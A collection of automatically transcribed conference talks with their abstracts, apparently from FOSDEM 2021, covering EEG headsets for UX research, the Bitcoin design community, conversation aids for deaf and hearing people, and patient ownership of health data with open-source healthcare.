of the beta range, gamma waves and tether waves, and some detected events like blinks, surprise, throne, and smile. If we would like to measure emotions, and we have raw data from electrodes of the EEG headset, we can use a little bit different, but more scientific than industry-grade approach, based on the emotions model named Circumplex, which was developed by James Russell. In this case, we use two, actually, we use two metrics, Arrosal and Valence. Arrosals may be negative, you are unhappy, or positive, you are happy. Arrosal can be, well, what it's named, so you may feel something intensive, or just an opposite. If you present these two parameters as a coordinate in two-dimensional space, then you can estimate some specific emotions like excitement, or maybe depression, boredom, stress, and so on. As you see on the left part of the slide, Arrosal can be measured by the data of four electrodes, AF3, AF4, AF3 and AF4. You just calculate total of beta waves on these electrodes, calculate total of AF4 waves, and divide one to another. Valence is calculated in a similar way. Actually it's difference between left and right hemisphere of your brain in alpha and beta ranges. Little bit more about getting raw data. If you see the previous diagrams, that's what a motive epoch will return you without the research license. It gives you the medium noise in specific range, frequency range, but nothing special about raw data from each electrode. So if you would like to get some estimation of emotional state based on these formulas, you need to access some raw data. In case of OpenBCI project, which is OpenHardware and OpenSource, things are obvious. In case of EEG from a motive, you still can use so-called ML Kit library, which is not so good from the usability point of view, but it allows you to get information from all sensors you need. After that, you should use some filtering to find the intensity in specific range and calculate. ML Kit even has some front ends. The best of them is absolutely dead. I mean the combination of libraries which it uses makes it extremely difficult to build it in contemporary environments. Actually it's a terrible mixture of number of Python libraries, fourth version of QT and WX widgets, and bad combination prevents it from working. So the probability that you will be able to build it is not very high. Still, you can use more modern web-based front-end, Scikit, or just create your own software using the Python or C language library of the ML Kit. And actually it has even version in Java for those who like it. A little bit about actual testing based on data from Ensophalography. Here is a brief example, a brief description of some example which tries to find out what's the effectiveness of window switching in three paradigms. One with the task panel, actually it's a Plasma desktop, then the GNOME Shells activity screen, and the now obsolete Ubuntu Unity window switching approach. So the task is copy-pasting numbers from one window, inserting them to another window, and doing it repeatedly, which involves switching between several windows. So one window, two end window, three are chosen randomly as the target of copying numbers, and window zero is the source of these numbers to copy. So here we can see comparison with mind concentration and tempo, which obviously is the speed of work. So GNOME provides the highest tempo of work, possibly because placing cursor in the left corner do not involve click, but instead involves some physical activity, which works like the overclocking for the user for a short period of time, of course. So and the lowest tempo was reached in Unity because of the inconvenient window switching model which involved several clicks to get necessary window. And actually the left panel is not so good as the placement of window switching tool. If we look at mind concentration, the highest mind concentration is reached in Unity because, well, the user is totally concentrated on moving cursor in horizontal direction. The lowest mind concentration still was reached in Plasma Desktop. One of the reasons was that people who were under testing were mostly familiar with Taskbar. And the other reason is that actually buttons are placed in same positions in the Taskbars and physical motor memory is used as well as vertical movements of the cursor with mouse or trackball easier than horizontal ones. So what's the results which you can get out from this talk? First of all, we should notice that consumer grade electroencephalography is nowadays enough major to be used in UI UX comparison of some interfaces. You can use mass market devices. These devices are more or less open source friendly. Also you should take into account that the more comprehensive device you plan to use, the more difficulties you will need in getting data from it. For example, a mind wave has only one channel but it's the best choice if you just need to measure mind concentration. It's the most cheap, it's the most easy to maintain and it's the most open source friendly one. If you use Epoch, especially the newer versions, you will have more substantially more difficulties because the motive makes a lot of effort to protect your electroencephalography data from yourself. And it will try to convince you to more expensive licensing for search needs. But still you can use some open source tools we were speaking about to get raw data and make calculations by yourself. And finally, open BCI sounds like the most open source friendly, well actually open source and open hand drive project among them, and the most comprehensive, but I'd say it's also the most expensive one if you buy it, or it's also a troublesome project if you build it yourself. Actually building it involves a lot of soldering, it's rather complex electronic device, and things are even worse because some of these components are not produced anymore. At least some simple capacitor arrays should be substituted by yourself, by some analogs. So it will demand not just soldering, but some electronics knowledge as well. So anyway, if you got the device and you can get metrics from it, and you can get time series of some EEG mergers parameters either when they're produced like metrics from NeuroSky and the MOLIF, or calculated by yourself. So you can get medium state of the user in situation when he or she works with hardware and finally get the estimate comparing several UI suits or interfaces. Which one is the most positive? Especially when you compare it with other parameters like the speed of work, the roads and so on. That's all.
|
Estimating the user's mental state with a set of special measuring devices can be helpful in detecting bottlenecks of the human-computer interaction. Until recent years, electroencephalography devices were too expensive and too complicated for most UX researchers, but now there are affordable consumer-grade EEG devices. The talk covers EEG headsets produced by NeuroSky and Emotiv, as well as the open hardware OpenBCI project. Each headset has its advantages and disadvantages for UI/UX research. Specifics of data that can be acquired from each headset is reviewed, and existing open-source tools and libraries to get these data are discussed. The talk explains how we can use EEG headsets to evaluate mind concentration and relaxation, as well as rejection and arousal factors, which can be used to detect positive and negative emotions. EEG usage scenarios are discussed with examples of the FLOSS projects exposed to such UI testing. Estimating the user's mental state with a set of special measuring devices can be helpful in detecting bottlenecks of the human-computer interaction. Until recent years, electroencephalography devices were too expensive and too complicated for most UX researchers, but now there are affordable consumer-grade EEG devices. The talk covers EEG headsets produced by NeuroSky and Emotiv, as well as the open hardware OpenBCI project. Each headset has its advantages and disadvantages for UI/UX research. Commercial devices have different primary goals complicating their usage for research with cyphering, special licenses and limitations in the vendor-provided proprietary SDKs - but open-source tools developed by the community improve the situation. OpenBCI is quite the opposite: it is fully open, but much harder to obtain/build. Specifics of data that can be acquired from each headset is reviewed, and existing open-source tools and libraries to get these data are discussed. The talk explains how we can use each headset to get information about the user's mental state. Mind concentration or relaxation is a highly informative parameter for UX; it can be easily evaluated and it can be obtained with any of the EEG headsets. Besides that, most of the reviewed devices provide enough data to measure rejection and arousal factors, which can be used to detect positive and negative emotions. Finally, EEG usage scenarios with examples of the FLOSS projects exposed to such UI testing are discussed.
|
10.5446/53605 (DOI)
|
Why did we decide to title it there? That's what it says on our homepage. Because we think that it is important to make Bitcoin more intuitive and accessible for everyone. I've always been attracted to design on the border of technology. Because new UI challenges and UX patterns emerge. So I was attracted to Bitcoin for that reason. There's a lot of complexity that I like. And just a lot of crazy people. This community, at least definitely in the wider open source community, and even within the Bitcoin community, is still not that visible. A lot of it, I feel, can be quite introductory as well. I feel like what we've got here is just a nice slick introduction to the community, as opposed to deep diving into anything. It's probably more about behind the scenes, isn't it? Like how it works, or, you know. 15 minutes, what do I want people to get out of this? Do we want to leave time for questions? Is it visibility, like Connor's saying, what's the goal? Because that would inform the title, or maybe the amount of information we're putting in each slide. Are we telling people how to design Bitcoin for everyone? We're showing them how we're doing it. Thank you for kicking me off here, Paolo. I will talk about how we're doing it, but let's start with a little bit of background. So my name is Christopher Ono. I am here to represent the Bitcoin design community. And as you may know, Bitcoin is magic internet money. Add something new to the internet. We're used to transferring information super fast around the whole world. But we also know everything on the internet can be copied. And Bitcoin has changed that, it has managed that there's a scarcity, that there are things that can be copied, and that is value. So it's an internet native currency, and it allows us to store value online and to exchange that very, very easily and seamlessly. It was proposed in 2008 in a white paper by an anonymous person or group of people called Satoshi Nakamoto. We don't know who they are. But it was launched in 2009 as an open source project, fully embracing open source and decent centralization and all of those good things. And now in 2021, we have about 100 million people who have Bitcoin wallets and who store value, who transfer value around the world. And as this user base has grown over time, it has shifted from those first initial people who are very tech focused, and now we have a global audience. And as it keeps growing and it's proven that it's robust and it works, that audience keeps evolving and the needs for, and the interaction needs are changing. So it needs to become more accessible. It needs to be easier to use. So everybody around the world, people who don't have access to traditional finance, potentially, that they can also interact with this and it helps them in their needs. And now users of central design is well positioned to help out with this continued growth and evolution of Bitcoin, at least that's what we believe in. So a lot of us in the Bitcoin design community, we for some reason we got into this field. We were fascinated by it. We wanted to do some work. We saw problems we wanted to solve in design and user experiences. But very soon we realized that this is not very well suited for designers there. First of all, there are very few designers. They're spread across this whole ecosystem. There are very few resources, very few best practices, and it was really made it difficult. So the idea came up to form a Bitcoin design community to create space for people to meet and exchange and discuss and create those resources that everybody wants and to help each other do good work. We have a website now, Bitcoin.design. So we started this about half a year ago. You can go to our website, get some basic information about what we're doing. And from the beginning we try to embrace creativity and the voice of all the individuals in this community. For example, this header banner here was created by Alexa. And you can click the submit your own button here right over my head. And it takes you to a page where you can submit your own homepage banner and it will rotate with all the other banners that were submitted. So from the very first impression we tried to say, you know, here's like a space for design and creativity. Our more transient conversation happens on Slack. And you can join via Bitcoin.designers.org. We have over 800 people now across almost all the time zones in the world. And a lot of discussion across all kinds of different topics from onboarding or more technical things and payments and design reviews. So Slack is private and more transient. GitHub is kind of where we form consensus around where we discuss our more long-term coordination things and our processes, things like, you know, who owns the domain and how is that managed. We also have our website up there and the Bitcoin Design Guide project that we're working on. And it's public and it's easy to see and observe. It's a transparent place to see all the activity that's happening and what we're working on. Our newsletter helps all of those people who are not 24-7 on Slack who have other things to do in their lives every three weeks. They get an email inbox with a short precise summary about what was done recently, what's happening, what's coming up, potentially, you know, opportunities to help out with different things. Always very short and precise. The other thing we're doing is we have weekly calls and we rotate between a few different formats. So the Bitcoin Design Community calls are an open format where everybody can show up and we have more open and loose discussion, sometimes presentations, sometimes different people host and organize them, and anybody can suggest topics, sometimes things that are very timely, governance things, sometimes it's just, you know, open conversation and chatting. The second thing that we do are Bitcoin Design Reviews and those are way more focused. That's where we try to get projects or designers to come in and sign up beforehand, provide some information about the design problem they have or something they'd like to get feedback on. And then we try to give very focused and organized feedback and also open up, you know, potential doors for future collaboration. As I mentioned, we have a design guide project, a big project that we, hopefully everyone in the community feels like they can work on. And we have, every three weeks, we have this jam session on there to also discuss what's happening in that project and organize and push things forward. There are also calls organized by community members, for example, this design sprint for merchants organized by Johns. So merchants also want to accept Bitcoin in their stores and their specific software being developed for that. And Johns organized a design sprint with the people working on some of that software to help identify user needs and all those things. And they were not familiar with the design sprint format, so we introduced them to that as well. There was also a lot of interest in using Figma and a lot of questions about how to use Figma. So we had a crash course on that that a lot of developers actually showed up lots of interest from the developer side. That was interesting. So we have a lot of different people working on all kinds of things, whatever they happen to be passionate about from different types of surveys to podcasts to art project, UI kids, different research and all kinds of things. And then we have this community project, the Bitcoin design guide. You can think of it as the human interface guidelines like Apple has a material design, we try to bring all the best practices together and not prescribe what to do, but provide the information people designers need to make good decisions for whatever problems they're trying to solve. And this also starts this whole section on getting started, which is meant for those new designers that are potentially struggling to figure out how to, what to even to do with Bitcoin, how to see themselves in this open source world and why Bitcoin is so different than things that they may know. There are also things like the visual language of Bitcoin, because it does not have a slick brand by a fancy agency. It has a visual language that evolved over time simply out of the community activity and the activity around Bitcoin. So laying out all those things will hopefully allow designers to more quickly get started in the field in this area. And then we go deeper into very specific and unique areas of design that are specific to Bitcoin. So it's a big work in progress. But I'm very excited about the progress on this one. So as I mentioned already, we're trying to embrace open source, the best of open source, but we're also trying to figure out what open design is like and what that means. Because not everything in open source or those practices that were established over the decades, they work so well for designers. Even just if you look at design tools, Figma does not have files and so they cannot be checked into GitHub, for example. So the total collaboration mechanisms that we know from kind of the Git based development don't really work so well for designers. They kind of counterintuitive, they're kind of hard to get into and learn, and some of them don't even work so well for the tools that we're using. So we're trying to pick the best of open source, make some tweaks, add some new processes and figure out ways that both designers and developers and everybody else can work with design, solve design problems in a way that they're comfortable with and that they can be productive with. So the worst in the area is always, you know, and this is a stereotype here, of course, that we have developers on the one side and they just want to code stuff and it's functional and ugly and then we have designers on the other side. They just want to make things look cool. And it's just not realistic. And we're trying to, first of all, change the dynamic, get everybody to collaborate and consider the same things, which ideally how the user needs, and then use the tools of development, use the tools of design to make something. Together. And then we also try to, you know, take it a step further here because there aren't just the stereotypes of designs and developers, people are complex. They're different rules. Some people want to translate some people to use a research. Some people really want to do community management or project management. And all of those are valid and important and needed. And also the user, so we can try to get them more involved in this process. So from, you know, from those stereotypes, it's a long way to get here and we're trying in 2021. We're going to try to sort through a lot of this stuff. It's another way to look at it and this is not a perfect representation here. So we're going to pick some of these relationships here like the interactions between designers and open source projects and designers not equal to designer, some designers, let's say they're they really love, you know, building out a brand or a visual style, and they're interested in short term collaborations, or they might be focused on one particular topic like onboarding or so. And other designers prefer being embedded in a project for a long period of time, and slowly iterate and see a project grow and have relationships with everybody in the project. It's very, very different roles. We're trying to help define those and facilitate for people to find those roles that they're comfortable with. And on the other hand, you know, projects, designers can't just just bump into projects, projects need to be open to accepting designers accepting design processes. So also trying to figure out how we can make that happen. User research is a little bit tricky in Bitcoin because we don't know who those users are. There's a big focus in anonymity and privacy. So we're trying to sort through how we can do good user research trying to gather research references so everything we do come up within the guide decisions we make also informed very well. And Bitcoin being a global phenomenon, doesn't really make it that much easier. But we're trying to work through that. And then of course, as I already mentioned before, ideally the Bitcoin design community cannot just for designers be this go to place, but it's can feel comfortable and say, Hey, I have a design problem here. I want to solve a we're looking for a designer. And ideally we can have to smooth back and forth and collaboration between everyone. So some of our more immediate next steps here in the next three months, end of the first quarter 2021, we are hoping to push a first version of the Bitcoin design guide life, ideally that covers the majority of the content looks pretty good. It's fairly complete to help allow people to solve problems, or most common problems at least, they come across when working on Bitcoin projects. And then we really need to collaborate with different projects. So our ideas about open design and design collaboration. We really need to put those to the tests and work directly with projects and integrate a lot of the work into those projects that we're working with and see results and get that user feedback in the end. And hopefully that allows us to validate all of our ideas and we'll make that Bitcoin design guide so much better because then it's been proven in the real world. And you know, the big thing is we need to mature. The community is six months old now. Lots of big ideas. Lots of excitement here, lots of activity. But, you know, we need to see how it all pans out and for that we need to experiment and test and iterate. I find that really exciting here. And a conference like this is also perfect to open up conversations and learn from others. So I hope, hope we can get in touch here with a lot of people. So thank you for listening. Thanks for the Bitcoin design community members who helped with this presentation. And thanks to Pablo Stanley who made these illustrations of all those people that were in these slides here. And now let's open it up for QA. Thank you.
|
Since the middle of 2020, an open community has formed around the goal of making Bitcoin more intuitive and accessible. Our big project is a Bitcoin Design Guide to help both designers and developers create better Bitcoin experiences faster. We also work to promote the idea of open design, to bring more designers into the space, and to help open-source projects adopt better design processes. This presentation will provide an overview of all these efforts, where we are (early) and what the future might hold.
|
10.5446/53611 (DOI)
|
you Hello, welcome to my presentation, our age communication kit, conversation starters for deaf and hearing. I'm Daniel Wesselig, an interaction designer from Berlin. Thank you to FOSDEM21 and especially the room DDesign for giving me the possibility to present some work here. The presentation will last approximately 15 minutes and a quick note in the beginning. I'm using a tool for this presentation. It's called Space Deck Open and it's kind of a mix of the proprietary tools Miro and Prezi in a way and I was quite glad to find this tool because it's a useful thing for workshops and so on. You can find the slides of this presentation under the link provided and there's also a link to the GitHub. You might be wondering what the connection between inclusive design and open source hard and software is and I've been part of a team for the last 20 months or so. EU funded project caribolds where it's the goal to collect and present and co-develop new solutions for individual needs and offer them in a replicatable form on a platform called welder.app. As we normally would be in Brussels right now and as I was last time at FOSDEM, a big shout out to open source publishing from Brussels. I've first seen them at a conference called typography leaped in Weimar probably 2010 and I really liked the concept of doing classical desktop publishing but only using open source tools to do so and also sharing like fonts and other things doing workshops and open source publishing probably had a part in me switching over to Linux and trying to do all my design work in Linux with open free and open tools. In 2015 or 2016 I was in Singapore at a lab called augmented human lab and we got the chance to develop a new starting indicator light for swimmers for deaf swimmers that would be used at competitions in general and the previous model was just one like orange blinky thing at the side so you had to like turn your head around and was difficult to see and you had like a real disadvantage in jumping from the starting block so we developed this project that consists of like two LED rings a green and orange one the green ones in the middle so you have like this anticipation phase and yeah and we made it compatible with an Omega timing system that is widely used. I really liked working on this project this was not necessarily like open source hardware but it was a way for me to work with deaf people and understand needs and requirements and transform them into a real product. I really like open hardware so this is a slide to illustrate my interest in open hardware in probably 2007 or something we did a project called Lute Claus Pro like a toy sequencer that won't show now but like yeah have a long-standing history of interest in open source hardware. This is kind of like a nerd joke but I think it's really important to use floss free Libre open source software to create open source hardware because it really lowers the barriers for contributors and for reproduction adaptation in general and this nerd joke is a little bit okay like you have to press both buttons to make the LED glow. This is Tomy the collaborator in this dialogue starter project. You can see Tomy with some prototyping materials where at an open source academy or open health academy we were together in the team and we're trying to find some solutions to help with communication between the deaf and the hearing and you can see on the right there's the prototype of a little owl that could serve as a translator and on the left Tomy is wearing like a mock-up of like some augmented display that was created during that process. Tomy is like an interface designer from Berlin and he's currently in Denmark at Frontranas and his Bachelor thesis in 2019 also was on the topic of and I tried to translate it because in German but like there's the translation interface designed to overcome barrier fears between deaf and hearing people. So Tomy is really interested in like he's very happy with his deaf community and he says there are all different cultural things and it's and it he feels very comfortable there but sometimes it also would be nice to meet new people outside of that bubble basically and as one can't actually see that someone is not hearing and is deaf it's not so easy to actually get into a conversation especially if there's no sign language translator in the room and so this is a topic where I'm trying to help to to find some some solutions and some ways to work with this. Deaf culture in general it's a super fascinating topic because of course there are all different kinds of like cultural shades and one design collective that I had the chance to meet they create a magazine that's called Deaf Magazine and they make content especially that has a connection with sign language and the deaf community. So if you I encourage you to check it out you see the link below and the slides. Morphoria design collective. These are some posts also from the OpenHealth Academy process of creating this all and in the end there also was like a prototype with like a raspberry pi inside and basically a way to for to me to type into telegram chat and then the whole that you could give to a person would actually like speak what he wrote in the in the chat and also when you said something to the to the all it was like doing speech recognition and sending it back to the telegram interface. The project that we are collaborating together at the moment is called Dialogstarte and it's supported by CityLab Berlin and by the Nutscom's Berlin. Thank you to these both institutions. So some notes on what we are doing there right now there's like one thing that we're working on is like a card set so basically physical card playing games to that have like certain conversations data texts on there and we're doing like a couple of workshops now to see what elements should be in there and additionally we want to make a hybrid game but we don't know exactly how yet but maybe involving some electronics and basically like some matchmaking ways that you can like answer by pressing a few buttons on this standalone device and yeah but like there will be more happening. Another product that we are working on or another project is the using LED badge and there is already this great project from FirstAsia it's called BadgeMagic and it's basically Android app that you can also find on asteroid where you can type in text and then it's sent via Bluetooth to this LED badge and we want to make like a physical speech bubble. It's a little bit comical and you can hold it up and then communicate things and say something. Hi I'm Daniel I'm an interaction designer from Berlin if you're interested in talking about the weather. Approach me or something so we want to make this visual tool of connecting with people for example at a meetup or some informal physical meeting situation and the goal is to make a parametric open s-card model as we did in other projects in the Kerber context in order to have a good adaptability so maybe it's possible to use it with different LED badges put like a stick in there maybe the speech bubble idea also changes and maybe it will get in different physical shape or something so we want to have this represented in a parametric model. Quick shout out to Kerber's there's the obligatory funding note and yeah I'm very happy that I was able to present to you some aspects and yeah check out our website and if you have questions there should be time for Q&A now. Thank you very much. Goodbye. Okay that went really good so far so now we we should be starting the Q&A you'll see I think it's broadcasting at the top of the video when when we're broadcasting oh I think we are ready. So I'm going to turn my video off. So there were a couple so SAPTAC had a very nice question. Sign languages as I know vary from country to country is there a way of localizing sign language it's a really nice question. I'm definitely not an expert but I know that like German Geburtensprache is also used in Belgium for example and maybe in Luxembourg I think and that there's like American Sign Language what's kind of a common set so they are very regionally different languages and dialects and do you mean like programmatically identifying them so I don't know about technology but I know that there's like some attempts to make gloves for example to capture it but that the movement of the hand is very that's that's not the whole story because like so much happens in the in the face so these these attempts are nice direction but probably not very useful. Okay okay so Jan had not exactly a question but more I guess a comment and maybe you might be able to speak a bit about it he says great that deaf people were involved and that you took interest in deaf culture. Very often this is lacking new devices frequently does miss the point. Yeah I think it's super important to not just I don't know design by assumption or something and actually talk to as many people as possible and try to I don't know like understand what what things could be that are interesting and which things are not necessarily interesting and and then take it from there basically and I think it's a very good experience and so also really great to learn about different cultures and so yeah it's very fascinating culture actually. Is there is there any okay so so Katarina has a question I don't know much about sign language and its universality but beside the visual backup are there any strategies for haptic movement devices vibrating are there vibrations that are universal and can be understood by multiple people something maybe similar to Morse Morse code so the that the this and the dash communication method but like a motion to draw attention to signify danger etc. So on the one hand I know that but I don't know how they technically work and I don't speak them but some people that are blind and deaf they there's communication ways by by touch but I don't know how they work exactly but it's very interesting because I did my PhD on like simple displays and I was also like trying to figure out if you just have like one pixel or something can you already express something that's more universal than a Morse code or something so I think the the goal would be to find tactile patterns that can be understood without having to learn it bit by bit basically or information like that you already get a feel for for danger and I'm not sure what like danger for example would feel like tech in a tactile way but but yeah I think that's a very fascinating and interesting way to do further research into okay you
|
Deaf Culture and Hearing Culture, both have established ways of communicating among each other. When you want to mix and mingle, members of both groups need to find new shared channels. We present design considerations leading to our playful prototypes, serving as icebreakers and dialog starters. We rely on open source software to create open source hardware.
|
10.5446/53612 (DOI)
|
Hello, my name is Johan Sonan. Let's talk about owning your health care experience. So I pretend to run a health care design studio outside Boston. I also teach in an academic center in Cambridge here. And as part of my health care background, you should know what's influencing my brain. Definitely it's not money. And if you have any concerns, well, heck, my entire genome has been open sourced on GitHub. You can download it, put it on a crime scene, make sure there's a goat or a sheep nearby. But if you have any questions or comments, feel free to email me. I'll try to get back to you within two business hours or publicly shame me on Twitter. Yes! The medical profession is noble. Hell yes. And yet it has been infiltrated by the mighty dollar for decades. And I think we use this nobility as a shield, as an umbrella to obscure some of our activities here. And let's look at one example here. The two square miles between, let's say, Harvard and MIT, because I'm looking hyper-locally, occupies about 25% of health care GDP. That's $750 billion. That is a ton. And that kind of concentration, the earth doesn't like it that much, at least in nature it doesn't. And that's 1% of global GDP. So the exercise here for me is to follow the money. Because it's really a systemic flaw that we have is that we put profits over people. And one example of this that's particularly egregious is from, been revealed by pro-publica New York Times, relatively recently, with a cat at a very good cancer institute in New York City. Where he just ran the gauntlet on ethics by breaking lots of ethical conflict of interest rules, from being on boards to being the editors of a magazine that publishes data and then proselytizing about it. It was a mess. And one particular case is about page.ai. It is a startup that was born inside the hospital that had exclusive rights to deal with the data of the patients. And yet it was owned by the hospital and paid for by the public. Hundreds of different clinicians encoded the data. It's not like they did it with one person. And really ultimately it's about making the rich richer with the executive team being the investment team for the startup. And it gets better that this work was done over 60 years. And again, it's my data, your data, people who visited, they have no idea that this is going on. All of it, again, for driven, for profit driven venture. And we're finding this in.eduland.org land where nonprofits and educational institutions are really going after different ways to make money. And I think this is a problem too that's infecting most of the United States and now most of the world. And look, he's hiding in plain sight. It's always interesting when someone's an intern and CEO at the same time. But the main thing here that I want to concentrate on is the data use agreement keeps us patients out of control. We don't have any kind of decision of what's happening to our tissue slides for economic use. So what kind of design is this? Well, look, hospitals own the data. We don't have ownership rights as patients. The IP is owned by executives, yet it's funded by the public. And this is a perfect example of corporate welfare at its finest. And ultimately, it's the rush for bucks over everything else. And this is ethics as situationally optional. It happens all over the planet, not just at Sloan Kettering, but at Walgreens, or you name it. And it's happening right now in Boston, actually, again, with the CMO of Moderna, who's one of the leading companies that are making the COVID vaccine, where he's taking out a million bucks a week from his company. He's got right to do that, but he just got a half a billion dollars of taxpayer money this year. That's the kind of world we live in. And yet here we are, we're complicit. We're sloughing our data everywhere, without rights, across the planet in order to feed the economic engines of the planet. So we have to understand a little bit the underpants of the scenario, which is, well, what are we sloughing around? What data? What kind of data is it? And so most often people think that health data is clinical in nature. But it's much more than that. It's any information about a person's life that assists in making decisions. This, by the way, was our definition for the Wikipedia article that we seeded just a few years ago. There was no health data article on Wikipedia up until a couple of years ago, insane. So you think about, OK, great, it's my labs. OK, it's what my doctor and I do together. Or my nurse, the clinical trials, my genome. Great. OK, yep. But it's way more than that. It's your salary. Your salary is a health data point. So is your neighborhood that you live. So is what you do. It's really life data. If you want a better and more detailed insight into this, we have an open source repository here, health determinants of health that show this a bit better. So health data is more than you think it is. And you don't own it. And you damn well should. Now GDPR, which many of you are probably familiar with, you live in it. It's a much more mature version of what we should be using here in the States. But it doesn't outline ownership either. In the recital seven, it says, OK, yep, control and access. But nothing about ownership. If you go deeper into the recital about right of access, it actually articulates that it does not belong to you. But it should. Why? Because your data is promiscuous. As you go and see a clinician, a nurse on your phone, whenever it is, it can go to the labs. It can go to the pharmacy. It can go to the PBMs, the pharmacy benefit managers, and go to the government. It goes across the spectrum, especially if you're going to ask Alexa what's happening, the round trip and how many services that handle that, there are hundreds, five or six hundred different services handled your data as it goes around trip from voice back to repeating it the answer to you. If you want some more information about this, we have another open source visualization here. Because, look, this has been an age of health care surveillance, but my hope, my supposition, is that patient data ownership turns into a net positive for this past couple decades. Because patients should own their data. And some well-known people are saying that, yep, the damn right should be, Cimaverma is the head of the biggest American and one of the biggest social medicine platforms in the planet. And one paper that outlines this very well, articulates three components to getting close to this sort of goodness, is that one, you need common data elements. Many countries have this problem where we can't even have the same definition for the same data point across systems. The second thing is, you have some kind of encounter receipt. So when I have a point with my clinician, something happens, I get something that's automatically pushed in my digital health record that in essence completes it because there's a contract in play between me and between that third party that then starts to say, okay, great, I can control my longitudinal digital health record. So how do I think about this? Well, if we were to make it in visual terms, I have some kind of encounter, whether it's at home, whether it's in a cardboard box in the alley, whether it's at a clinic, fine, I talk to a nurse. And he and we have this brokered data use agreement that says, okay, as a patient, yep, sure, I'll let you see it. I'll just see it for this long. And it articulates how that can work. And the underbelly of that really is a technical service that then pieces together the data, attaches it to the right place, and creates this sort of data receipt of what happened. And then that gets injected into my lifelong health record. That's in essence how I think this should work. Because we'll have this matrix-esque little patient data manager bot putting together your data in the context of whether I'm doing it from home, whether I'm talking to a device, whether I'm talking to a human, and ultimately this output goes back into my record. Because what does this get me? Well, it gets me something, one aspect of that is it gets me how complete is my record? Is my record empty? Is it half complete? No one really gets to complete, but it allows us to get some kind of glimpse as how many cobwebs are on it. Can I trust this data? By the way, as a side note here, it took a bunch of overeducated MDS and PhDs to put together a paper that says, drawing pictures helps comprehension for humans. Well, no kidding. But I think this is important because academics, scientists, all of us need ways to see stories versus being told and reading about them. So I think this is why many of us use this kind of powerful graphics in healthcare. Humans resonate with them. Okay. Onwards to owning your data. So number three, when you own it, you control access, damn it. And let's go back to just the creamy center of this is the DUA, the data use agreement, and then the data receipt is, we have a prototype type of this. It's on GitHub and you can control your data using a data manager, but we've made this accessible to most humans. It's written in very simple English that a fifth grader could understand. It's high contrast imagery. It's very simple, little graphic novels. And you can put this on top of any kind of framework. You can put it on top of Apple's health kit, which is open source or the Android's common health platform, and get deeper and deeper into this and actually see a receipt. What if you could actually listen to what happened in that conversation with your clinician? You see the data that happened, that moved and changed. You could see where it resides on the social determinants of health and your social circumstances attached to your data and vice versa, because it's yours. You should see all this because ultimately it gives you health autonomy by owning it. And what are those rights? Well, you can possess it. Yep, that's mine. You can share it to whoever, whatever you want. You can sell it. Yeah, you can destroy it too because it's yours. Now, the idea here is that patients co-own or fully own every health data point about themselves. And anything that I generate with a clinician or clinic is co-owned by both parties because they still need to have some rights once you come into the clinic to see the information or make judgments, etc. And have it for audit, have it for research. And then anything I do, I should fully own. It's my data, my rights. Any data that doesn't give this to you is mistreating you. And it really is the last bastion of help for capitalism. This unfettered capitalism is selling your experiences, buying your mind. And I think that I demand patient ownership rights to put a kibosh on that. So if you can look at this, if you want, at datauseagreement.org, it's on GitHub. And you need to see, I think, that it has publicly accessible code on GitHub, that it's licensed under Apache license and that it's there for community. It's there for feedback, for interrogation. So why are all these things open source? Well, good reasons. You can't solve this problem of healthcare without community, without other people. So 70 years ago, this sounds mighty open source to me, declaration of Geneva. I'm going to share my medical knowledge for the planet. Fabulous. Here we have knuckleheads in the United States and elsewhere. It's not indigenous only here. That our algorithm that's closed, it's amazing, it care plans for half the population. Really? Well, if we think that healthcare is a human right, it pretty much is. But when you use it, you don't know how it works, why it works, and who works best for. And that to me is a sin. So if healthcare is so noble, if it's key to our life on earth and we don't have a choice, we demand healthcare to be open. Well, there's good precedent here, the healthcare at least, the internet, the infrastructure is open source and a human right. And for those nerds in the audience who love the OSI model, most of the stack in the internet is open source. Fantastic. We have great examples of it that's driving this conversation in our viewing right now. And yet, in contrast, in stark contrast, healthcare stack is closed. And yet, I think Eric Topol calls it anti-open source in healthcare. Lots of, again, good people have talked about it being open source, that Epic should be open source, the big giant electronic healthcare company, etc. We just don't have it. One country on spaceship earth has data ownership for patients and an open source background, my home country of Estonia. It's a really fantastic example of how healthcare could work. Yet, we're making strides, I think, across the planet for other open source healthcare services. And we see it in use in infrastructure and common goods and the leading edge. And now that we have a global emergency over the past year, you've seen a glut of open source projects, which is fantastic in healthcare. Here's the NIH, a value set authority. Here's my news feed having actually open source healthcare in it for the first time ever. You can see on GitHub there are 33,000 repos in COVID land. I mean, there's 6,000 in the date picker. My God, it's fantastic. We open source at the studio all of our work that we do internally from understanding coronavirus to the multi-translated home care basics to HGRAF to this data use project. Linux Foundation has been radically moving the needle, hopefully, more and more, same with MITRE and other institutions. It's a pretty amazing response, but we're not close to done. Because we really want marching rights for the patent. We want some kind of open patent, open chemistry, open license for the planet for the vaccine. We need to think about this as a public health issue and a public problem with public solutions. And this is part of our act is we have to be deliberate in how much we do and work in open source. We have to continue to evangelize. Open source is really contracting and has been for the past several years. And so we have to fight against that and pretend that it's not just something nice to do, but that it's an opt out strategy that we lead our companies into open source. This is how health care, open source health care prospers. Because look, health care and public health is utility. It's a human right and way too important to be closed. These algorithms that drive my care are all locked up in black box services. We need to interrogate them. We need to understand how to edit them, how they work and how to make them better for all. Because it is our health, it's my life, it's all of our lives at stake. And we demand that health care services be open to correct the bias. So to recap, health care data is more than you think it is. You don't own it and you damn well should. When you own your data, you control access and owning it gives you autonomy. And you really can't solve the health care systemic problems until you ask the community to join. Finally, having your health data can save your life. I have stolen from these people here and I thank them for it. And if you have any questions or want to read more, go here. Thank you very much.
|
We demand that patients own their data. We demand that healthcare services are open source. Because healthcare is too important to be closed. We are getting screwed. We’re dying younger, maternal mortality is ticking up, and big money is running healthcare, at our expense. The data that drive our care, the algorithms that dictates our parents care, our neighborhood’s care, our nation’s care, and the everyday services we rely on, feed on our experiences, are governed by black boxes and crooked biases, and are owned by others. It’s our health. Our very lives are at stake. We demand that patients own their data. We demand that healthcare services are open source. Because healthcare is too important to be closed. See how we, the atomic units of the health system, can bend it back to the light.
|
10.5446/53613 (DOI)
|
